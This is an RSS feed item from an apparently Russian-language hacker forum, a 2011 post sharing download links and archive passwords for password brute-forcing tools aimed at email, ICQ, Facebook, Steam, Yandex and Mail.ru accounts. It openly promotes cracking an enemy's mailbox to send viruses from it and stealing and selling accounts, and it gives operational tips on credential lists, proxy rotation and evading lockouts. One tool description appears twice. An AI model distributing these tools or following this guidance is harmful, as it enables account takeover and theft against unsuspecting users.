			<description>&lt;p&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;http://xaker26.siteedit.ru/images/bbbbbb.jpg&quot; alt=&quot;http://xaker26.siteedit.ru/images/bbbbbb.jpg&quot; /&gt;&lt;br /&gt;BrutusAET - это программа для подбора паролей по словарю к HTTP (Basic Auth), HTTP (Form), FTP, POP3, Telnet, SMB (NetBios), Custom, вообщем ко всему чему только можно.&lt;br /&gt;&lt;a href=&quot;http://depositfiles.com/ru/files/u7gvdactv&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://depositfiles.com/ru/files/u7gvdactv&lt;/a&gt;&lt;br /&gt;Пароль: 5555&lt;/p&gt;
						&lt;p&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;http://xaker26.siteedit.ru/images/aaaaaaaa.jpg&quot; alt=&quot;http://xaker26.siteedit.ru/images/aaaaaaaa.jpg&quot; /&gt;&lt;br /&gt;DukeNN Mail Bruter 3.03 [F I N A L] edition - хоть и старый но лучший брут форсер для мыло . Респект корефану (Дюкенн).&lt;/p&gt;
						&lt;p&gt;&lt;a href=&quot;http://depositfiles.com/ru/files/cxsm9i1di&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://depositfiles.com/ru/files/cxsm9i1di&lt;/a&gt;&lt;br /&gt;Пароль: 5555&lt;/p&gt;
						&lt;p&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;http://xaker26.siteedit.ru/images/rdorldrrdr.jpg&quot; alt=&quot;http://xaker26.siteedit.ru/images/rdorldrrdr.jpg&quot; /&gt;&lt;br /&gt;Xavior v 1.0 beta 7&lt;br /&gt;Автоматический подбор паролей к любым Internet-ресурсам.&lt;br /&gt;Из особенностей можно отметить то, что при обрыве соединения она&lt;br /&gt;запоминает свое текущее состояние и в дальнейшем может продолжить&lt;br /&gt;работу с того места, где она была прервана.&lt;br /&gt;Работает в многопоточном режиме, так что скорость перебора у него высока.&lt;br /&gt;Кроме того, прога может работать спрятавшись за анонимным proxi-сервером,&lt;br /&gt;что очень полезно.&lt;br /&gt;Xavior v1.0 Beta7 - Инсталлируем, там ничего сложного и сверхъестественного, вот у нас уже есть оружие начинающего Хакера. Вот запустил ты эту прогу на своей тачке и видишь уродство и говоришь себе: &amp;quot;Блин что это за убожество, отстой, ни картинок тебе, ни нормального ХЕЛПА...&amp;quot; (у меня так и было...=) Но всё пока ты не понимаешь ценности этой вещи. Ну вот например я тебе напишу неполный список того что ты можешь сделать с помощью этой проги: подобрать пароль к мылу своего заклятого врага и поотсылать от его мыла выря или лошадку, поломать ТЕХ. ПОДДЕРЖКУ своего ПРОВА и раздобыть себе ХАЛЯВНЫЙ АККАУНТИК и делать далее всё что твоей Хацкерской душеньке угодно (даже продать его=), раздобыть себе АККАУНТИК к ПОР***** и многое другое.&lt;br /&gt;&lt;a href=&quot;http://depositfiles.com/ru/files/oeajj1cnr&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://depositfiles.com/ru/files/oeajj1cnr&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;http://xaker26.siteedit.ru/images/ppppppp.jpg&quot; alt=&quot;http://xaker26.siteedit.ru/images/ppppppp.jpg&quot; /&gt;&lt;br /&gt;Xavior v 1.0 beta 7&lt;br /&gt;Автоматический подбор паролей к любым Internet-ресурсам.&lt;br /&gt;Из особенностей можно отметить то, что при обрыве соединения она&lt;br /&gt;запоминает свое текущее состояние и в дальнейшем может продолжить&lt;br /&gt;работу с того места, где она была прервана.&lt;br /&gt;Работает в многопоточном режиме, так что скорость перебора у него высока.&lt;br /&gt;Кроме того, прога может работать спрятавшись за анонимным proxi-сервером,&lt;br /&gt;что очень полезно.&lt;br /&gt;Xavior v1.0 Beta7 - Инсталлируем, там ничего сложного и сверхъестественного, вот у нас уже есть оружие начинающего Хакера. Вот запустил ты эту прогу на своей тачке и видишь уродство и говоришь себе: &amp;quot;Блин что это за убожество, отстой, ни картинок тебе, ни нормального ХЕЛПА...&amp;quot; (у меня так и было...=) Но всё пока ты не понимаешь ценности этой вещи. Ну вот например я тебе напишу неполный список того что ты можешь сделать с помощью этой проги: подобрать пароль к мылу своего заклятого врага и поотсылать от его мыла выря или лошадку, поломать ТЕХ. ПОДДЕРЖКУ своего ПРОВА и раздобыть себе ХАЛЯВНЫЙ АККАУНТИК и делать далее всё что твоей Хацкерской душеньке угодно (даже продать его=), раздобыть себе АККАУНТИК к ПОР***** и многое другое.&lt;br /&gt;&lt;a href=&quot;http://depositfiles.com/ru/files/oeajj1cnr&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://depositfiles.com/ru/files/oeajj1cnr&lt;/a&gt;&lt;br /&gt;&lt;/p&gt;
						&lt;p&gt;Yandex Brute - служит для взлома яндекса или электронной почты зарегистрированной на яндексе.&lt;br /&gt;&lt;a href=&quot;http://depositfiles.com/ru/files/6rbcbrrug&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://depositfiles.com/ru/files/6rbcbrrug&lt;/a&gt;&lt;br /&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;http://xaker26.siteedit.ru/images/lrplp.jpg&quot; alt=&quot;http://xaker26.siteedit.ru/images/lrplp.jpg&quot; /&gt;&lt;/p&gt;
						&lt;p&gt;ВСЕМ знакомый&amp;#160; IPDbrute_2.0_Lite - брутус для взлома UIN:pssword в ICQ.&lt;br /&gt;&lt;a href=&quot;http://depositfiles.com/ru/files/jlbd0yvru&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://depositfiles.com/ru/files/jlbd0yvru&lt;/a&gt;&lt;br /&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;http://xaker26.siteedit.ru/images/icqip_brute_v0_1.jpg&quot; alt=&quot;http://xaker26.siteedit.ru/images/icqip_brute_v0_1.jpg&quot; /&gt;&lt;/p&gt;
						&lt;p&gt;icqip brute v0.1 - клёвый Брут для icq с не обычным интерфейсом не требующий прокси листа. Не знаю как 6, 7, 8 знаки но 9 знаки за чесов пять 25 нашёл)&lt;a href=&quot;http://depositfiles.com/ru/files/k35lxqar5&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://depositfiles.com/ru/files/k35lxqar5&lt;/a&gt;&lt;br /&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;http://xaker26.siteedit.ru/images/rip_by_dread_v0_1.jpg&quot; alt=&quot;http://xaker26.siteedit.ru/images/rip_by_dread_v0_1.jpg&quot; /&gt;&lt;/p&gt;
						&lt;p&gt;Rip by Dread v0.1 - простой брутус для icq по UIN;PASS.Миниатюрен и очень прост в использовании, а самое главное работает без прокси.&lt;br /&gt;&lt;a href=&quot;http://depositfiles.com/ru/files/7mt5xtymb&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://depositfiles.com/ru/files/7mt5xtymb&lt;/a&gt;&lt;br /&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;http://xaker26.siteedit.ru/images/icq_brute_v_1_0_by_fr_met.jpg&quot; alt=&quot;http://xaker26.siteedit.ru/images/icq_brute_v_1_0_by_fr_met.jpg&quot; /&gt;&lt;/p&gt;
						&lt;p&gt;ICQ Brute v 1.0 by fR@meT - простой icq брутус. Прост в использовании, работает без прокси листа что облегчает с ним работу, легко сворачивается в трей и не мешает работе.&lt;br /&gt;&lt;a href=&quot;http://depositfiles.com/ru/files/evadmbtao&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://depositfiles.com/ru/files/evadmbtao&lt;/a&gt;&lt;br /&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;http://xaker26.siteedit.ru/images/mails_v1_7.jpg&quot; alt=&quot;http://xaker26.siteedit.ru/images/mails_v1_7.jpg&quot; /&gt;&lt;/p&gt;
						&lt;p&gt;VerifyMails v1.7b - не плахой чекер мыла типа Брута. Чекает мыло на mail.com, yahoo.com, hongkong.com, xaker.ru, hotmail.ru, mailgate.ru, hotmail.com, mail.ru, aol.com. Также данная прога обновляется, есть возможность работать через прокси. Вы спросите а как ей чекать, А ЛЕГКО. Берёте любой генератор паролей к примеру Powerful GeneratoR, генерируете список паролей, берёте заготовленный лист с майломи засовываете в генератор паролей и туда же суёте сгенерированные пасы и соединяете всё. У вас должно получится типа того что вы видите в проге тобиш МЫЛО;ПАСС. Загружаете данный списак в прогу, выстанавливаете во сколько потоков вы хотите чтоб прога чекала мыльцы и жмёте старт. По окончанию работы в закладке ПОДХОДЯЩИЕ будут ваши подобранные мыльца, так же при закрытии проги подобранные мыльца будут находится в текстовом файле goodsave.txt.&lt;br /&gt;&lt;a href=&quot;http://depositfiles.com/ru/files/a361fkzc1&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://depositfiles.com/ru/files/a361fkzc1&lt;/a&gt;&lt;br /&gt;&lt;/p&gt;
						&lt;p&gt;вот ещё парочка&lt;br /&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;http://pro-xaker.do.am/_ld/3/s30954340.jpg&quot; alt=&quot;http://pro-xaker.do.am/_ld/3/s30954340.jpg&quot; /&gt;&lt;br /&gt;&lt;/p&gt;
						&lt;p&gt;Брут социальной сети Facebook.com&lt;/p&gt;
						&lt;p&gt;Режимы брута:&lt;br /&gt;Один логин + Список паролей (Не рекомендуется, т.к. идет блокировка аккаунта. Прокси не помогут)&lt;br /&gt;Один пароль + Список логинов&lt;br /&gt;Список &amp;quot;логин;пароль&amp;quot;&lt;br /&gt;Список логинов + Список паролей&lt;br /&gt;Тестирование показало, что успешно находится валидный аккаунт при бруте без прокси и после 10000 попыток (см. скриншот&lt;br /&gt;пароль -&amp;#160; avtuh.ru&lt;br /&gt;скачать&amp;#160; &amp;#160;&lt;a href=&quot;http://files.avtuh.ru/facebookBrute.rar&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://files.avtuh.ru/facebookBrute.rar&lt;/a&gt;&lt;br /&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;http://s39.radikal.ru/i083/1005/eb/733f0d1f3fd2.jpg&quot; alt=&quot;http://s39.radikal.ru/i083/1005/eb/733f0d1f3fd2.jpg&quot; /&gt;&lt;/p&gt;
						&lt;p&gt;Брут предназначен для восстановления забытого пароля к steam аккаунту.&lt;br /&gt;Поддержка прокси (http,sock4/5)&lt;br /&gt;Многопоточность&lt;br /&gt;Встроенный чекер Аккаунтов&lt;br /&gt;Хорошая скорость&lt;br /&gt;Автоматическое сохранение good-ов.&lt;br /&gt;Автоматическое сохранение error-ов.(для того чтобы можно было перебрутить аккаунты попавшие на ошибки соединения).&lt;/p&gt;
						&lt;p&gt;Для начала работы:&lt;br /&gt;Укажите в соответствующих полях txt файлы, один вида login;pass - список аккаунтов, второй proxy:port - прокси.&lt;br /&gt;Затем укажите какой тип прокси использовать,укажите тайм аут коннекта прокси и жмите START.&lt;br /&gt;Примечание:&lt;br /&gt;1)Брут не реккомендуеться блондинкам&lt;br /&gt;2)Поскольку на сайте без капчи можно ввести неверный пароль 2 раза - проксей надо очень много.&lt;br /&gt;3)Если вам кажеться что брут остановился - значит у вас закончились прокси или логины.&lt;br /&gt;4)Реккомендуеться использовать приватные прокси ибо с пабликом возможны ошибки подключения&lt;br /&gt;скачать &lt;a href=&quot;http://haksoft.ucoz.org/load/ss/1-1-0-8&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://haksoft.ucoz.org/load/ss/1-1-0-8&lt;/a&gt;&lt;br /&gt;еси шо сайт мой&amp;#160; &amp;#160;и это не реклама&lt;br /&gt;просто на компе есть&lt;/p&gt;
						&lt;p&gt;Mail.ru SECRET Bruter - брут по секретному вопросу&lt;br /&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;http://pro-xaker.do.am/news2/mail_secret_bruter.jpg&quot; alt=&quot;http://pro-xaker.do.am/news2/mail_secret_bruter.jpg&quot; /&gt;&lt;br /&gt;Брутер секретных вопросов для mail.ru&lt;/p&gt;
						&lt;p&gt;[+] Поддержка (mail.ru,list.ru,bk.ru,inbox.ru)&lt;br /&gt;[+] Многопоточность&lt;br /&gt;[+] Поддержка HTTP проксей&lt;/p&gt;
						&lt;p&gt;[-] На один аккаунт брут не расчитан&lt;/p&gt;
						&lt;p&gt;ссыль&lt;br /&gt;&lt;a href=&quot;http://depositfiles.com/ru/files/x20xh70vd&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://depositfiles.com/ru/files/x20xh70vd&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;2&lt;br /&gt;PoisonBrut&lt;br /&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;http://pro-xaker.do.am/news2/PM_brute.jpg&quot; alt=&quot;http://pro-xaker.do.am/news2/PM_brute.jpg&quot; /&gt;&lt;br /&gt;думаю объяснять ничего не надо, все просто и видно на скрине.&lt;/p&gt;
						&lt;p&gt;ну вот и обновление с потдержкой проксей, правда только носков,&lt;br /&gt;и ради бога не используйте говнопрокси и не постите потом что все летит в эрроры.&lt;br /&gt;настроики:&lt;br /&gt;overwrite proxy - если галочка стоит брут в текстовике удалит дохлые прокси(через указанное количество минут и в конце брута)&lt;br /&gt;use proxy - если галочка стоит идет прокси брут, иначе обычный&lt;br /&gt;time out - тайм оут подключения в мсек, первая цифра для прокси сервера, вторая для почтового&lt;br /&gt;proxy check - сколько неудачных попыток сконектица есть у проксика прежде чем брут его признает мертвым&lt;/p&gt;
						&lt;p&gt;очередное обновление&lt;br /&gt;добавлен брут по smtp серверу&lt;br /&gt;добавлена потдержка http прокси(правда только тех которые потдерживают метод коннект)&lt;br /&gt;пофиксины баги&lt;br /&gt;удален вирус делфи инклуд :)&lt;/p&gt;
						&lt;p&gt;очередное обновление&lt;br /&gt;пофиксины очередные баги&lt;br /&gt;полностью переделана работа с прокси&lt;br /&gt;добавлена галочка good(и гуд тхт сохраняеться кроме мыла и пароля еще и колво писем)&lt;br /&gt;&lt;a href=&quot;http://letitbit.net/download/3431.3afebc04e7369c5aa7ff6e1df/PM.rar.html&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://letitbit.net/download/3431.3afeb &amp;#8230; M.rar.html&lt;/a&gt;&lt;/p&gt;</description>
			<author>mybb@mybb.ru (-=INDOGO=-)</author>
			<pubDate>Wed, 30 Mar 2011 11:34:38 +0400</pubDate>
			<guid>http://indogohacker.forumbb.ru/viewtopic.php?pid=48#p48</guid>
		</item>
	</channel>
</rss>
